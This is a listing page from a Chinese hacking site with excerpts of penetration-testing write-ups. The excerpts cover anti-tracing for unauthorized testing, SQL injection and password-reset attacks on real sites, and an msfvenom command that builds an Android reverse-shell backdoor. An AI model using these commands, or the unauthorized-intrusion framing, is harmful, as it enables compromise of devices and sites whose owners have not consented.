最新发布第19页
一体化跨平台渗透系统 -- 棱镜X-X黑手网

一体化跨平台渗透系统 — 棱镜X

免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自...
admin的头像-X黑手网admin9个月前
61368
渗透测试反溯源-X黑手网

渗透测试反溯源

为什么要反溯源在很多企业src,或者在攻防演练的过程中如何避免被溯源?很多小白为了CNVD证书,不断的去寻找一些权重比较大的公司的业务系统进行渗透测试,但是这些系统都是没有经过授权的,那...
admin的头像-X黑手网admin9个月前
07112
记edusrc一处信息泄露登录统一平台-X黑手网

记edusrc一处信息泄露登录统一平台

前言我们都知道像大学之类的各种平台的登录账号基本上是学号,初始登录密码基本上是学生身份证的后6位再拼接上一些带有学校缩写的英文字母。所以我们在找漏洞的时候可以换一种思路,先通过去找...
admin的头像-X黑手网admin9个月前
0578
实战SRC | 某站点后台管理系统SQL注入-X黑手网

实战SRC | 某站点后台管理系统SQL注入

0x01 前景在进行fofa盲打站点的时候,来到了一个后台管理处看到集市二字,应该是edu站点 确认目标身份【归属】(使用的quake进行然后去ipc备案查询)  网站后台很像cms搭建的,在查看网站时...
admin的头像-X黑手网admin9个月前
0835
实战:记一次甲方特殊要求的渗透报告-X黑手网

实战:记一次甲方特殊要求的渗透报告

项目地址:http://www.xxxx.cn甲方给了个手机号就没得了,这甲方真是瞧不起我们,我们需要的是手机号吗,我们需要的是后台的账号密码。甲方的要求:给这个手机号上的积分增加到50积分该网址已经...
admin的头像-X黑手网admin9个月前
05413
实战:某edu后台任意用户密码重置-X黑手网

实战:某edu后台任意用户密码重置

1.访问网页:http://xxx.xxx.edu.cn:9091/findpwd2.在输入用户名的输入框中进行测试寻找有的用户名 3.发现test用户名存在进行尝试获取验证码,使用burp抓包进行获取验证码 4.填写成自己的手机...
admin的头像-X黑手网admin9个月前
0496
实战:旅游到印度,看看三哥有没有教三嫂网络安全-X黑手网

实战:旅游到印度,看看三哥有没有教三嫂网络安全

前言感谢大哥的投稿  你们好,又是我,今天就不说网上冲浪了,毕竟谁冲浪能冲到印度去啊,又不是去看三嫂被三哥欺负。  首先打开网站,哦豁,我就认识username和passwd,我的四级白考了,还...
admin的头像-X黑手网admin9个月前
0647
实战:记一次从上网冲浪到提桶跑路-X黑手网

实战:记一次从上网冲浪到提桶跑路

前言前几天在网上冲浪,突然看见一个网站,第一反应:这该不会是杀猪盘后台吧。果断开始信息收集。先看看IP,在香港。先上nmap扫一波端口。开了6379端口。6379不就是redis默认端口吗?看看能不...
admin的头像-X黑手网admin9个月前
0756
实战:国外某站sql注入渗透测试-X黑手网

实战:国外某站sql注入渗透测试

1.访问网站:http://www.xxxx.ac.in/news.php?id=22.判断是否存在sql注入payload:http://www.xxxx.ac.in/news.php?id=2%273.这么一看,明显就是报错注入了,既然是报错注入那么一般就是updatexm...
admin的头像-X黑手网admin9个月前
0537
New密码字典生成工具v0.32(14种拼音格式|IP地址处理|密码字典生成)-X黑手网

New密码字典生成工具v0.32(14种拼音格式|IP地址处理|密码字典生成)

 Part1 前言 大家好,这是朋友ABC_123。在日常的安全服务工作、红队攻防比赛、渗透测试项目中,经常会遇到对网络设备密码、Web管理员密码、Mysql Oracle SQLServer数据库密码、SSH FTP SFTP密...
admin的头像-X黑手网admin11个月前
510415
天刃 - 车联网安全渗透测试系统-X黑手网

天刃 – 车联网安全渗透测试系统

免责声明本站所发布的文章及工具只限交流学习,本站不承担任何责任!如有侵权,请告知我们立即删除。TranSec OS简介TranSec OS是一个基于Ubuntu 18.04的车联网渗透测试发行版系统,主要用于针对...
admin的头像-X黑手网admin11个月前
61577
局域网在线设备扫描工具V2.0简介-X黑手网

局域网在线设备扫描工具V2.0简介

本工具软件是号主自主研发,主要用于局域网内在线设备扫描,可以扫描出局域网内在线设备IP地址,更好的方便维护网络。1.本工具软件用途:一个场所的在线设备(例如:监控摄像头或计算机)一般都...
admin的头像-X黑手网admin11个月前
71177
小白向--msf入侵安卓手机-X黑手网

小白向–msf入侵安卓手机

环境:攻击方:nethuner(OnePlus 6t) 192.168.1.83目标机:vivo y551、生成后门程序msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.83 LPORT=5555 R>1.apk #生成后门程序(1...
浅末的头像-X黑手网超级会员浅末11个月前
046519